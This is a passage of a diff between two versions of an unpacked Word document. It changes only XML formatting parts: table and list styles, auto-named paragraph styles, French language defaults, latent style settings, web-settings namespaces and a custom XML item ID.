+  </w:style>
+  <w:style w:type="table" w:default="1" w:styleId="TableauNormal">
+    <w:name w:val="Normal Table"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:tblPr>
+      <w:tblInd w:w="0" w:type="dxa"/>
+      <w:tblCellMar>
+        <w:top w:w="0" w:type="dxa"/>
+        <w:left w:w="108" w:type="dxa"/>
+        <w:bottom w:w="0" w:type="dxa"/>
+        <w:right w:w="108" w:type="dxa"/>
+      </w:tblCellMar>
+    </w:tblPr>
+  </w:style>
+  <w:style w:type="numbering" w:default="1" w:styleId="Aucuneliste">
+    <w:name w:val="No List"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="37DBAF1854124417908D74BB902BA405">
+    <w:name w:val="37DBAF1854124417908D74BB902BA405"/>
+    <w:rsid w:val="00FB4360"/>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1BB6E017ABC349668A76D2E6B6FF09CD">
+    <w:name w:val="1BB6E017ABC349668A76D2E6B6FF09CD"/>
+    <w:rsid w:val="00FB4360"/>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="E96642C30A904F28BB3EE8E0446B61BF">
+    <w:name w:val="E96642C30A904F28BB3EE8E0446B61BF"/>
+    <w:rsid w:val="00FB4360"/>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="4B173BECAA9E495388C88F13B941B9C4">
+    <w:name w:val="4B173BECAA9E495388C88F13B941B9C4"/>
+    <w:rsid w:val="00FB4360"/>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="5A5511C25BAE4A17AC4003190907EC5E">
+    <w:name w:val="5A5511C25BAE4A17AC4003190907EC5E"/>
+    <w:rsid w:val="00FB4360"/>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="AA04B5C9366F44B9967EE15278B1E7FF">
+    <w:name w:val="AA04B5C9366F44B9967EE15278B1E7FF"/>
+    <w:rsid w:val="00FB4360"/>
+  </w:style>
+</w:styles>
+</file>
+
+<file path=word/glossary/stylesWithEffects.xml><?xml version="1.0" encoding="utf-8"?>
+<w:styles xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
+  <w:docDefaults>
+    <w:rPrDefault>
+      <w:rPr>
+        <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+        <w:sz w:val="22"/>
+        <w:szCs w:val="22"/>
+        <w:lang w:val="fr-FR" w:eastAsia="fr-FR" w:bidi="ar-SA"/>
+      </w:rPr>
+    </w:rPrDefault>
+    <w:pPrDefault>
+      <w:pPr>
+        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+    </w:pPrDefault>
+  </w:docDefaults>
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
+    <w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="toc 1" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 2" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 3" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 4" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 5" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 6" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 7" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 8" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 9" w:uiPriority="39"/>
+    <w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
+    <w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
+    <w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Table Grid" w:uiPriority="59"/>
+    <w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:uiPriority="37"/>
+    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
   </w:latentStyles>
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
@@ -21793,7 +21063,7 @@
 </file>
 
 <file path=word/glossary/webSettings.xml><?xml version="1.0" encoding="utf-8"?>
-<w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid">
+<w:webSettings xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" mc:Ignorable="w14">
   <w:optimizeForBrowser/>
   <w:allowPNG/>
 </w:webSettings>
@@ -22108,7 +21378,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{715B5DEC-B168-47AB-9147-610035A5B1AF}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{95F38DAF-79A7-4222-A281-B48F912F23A3}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
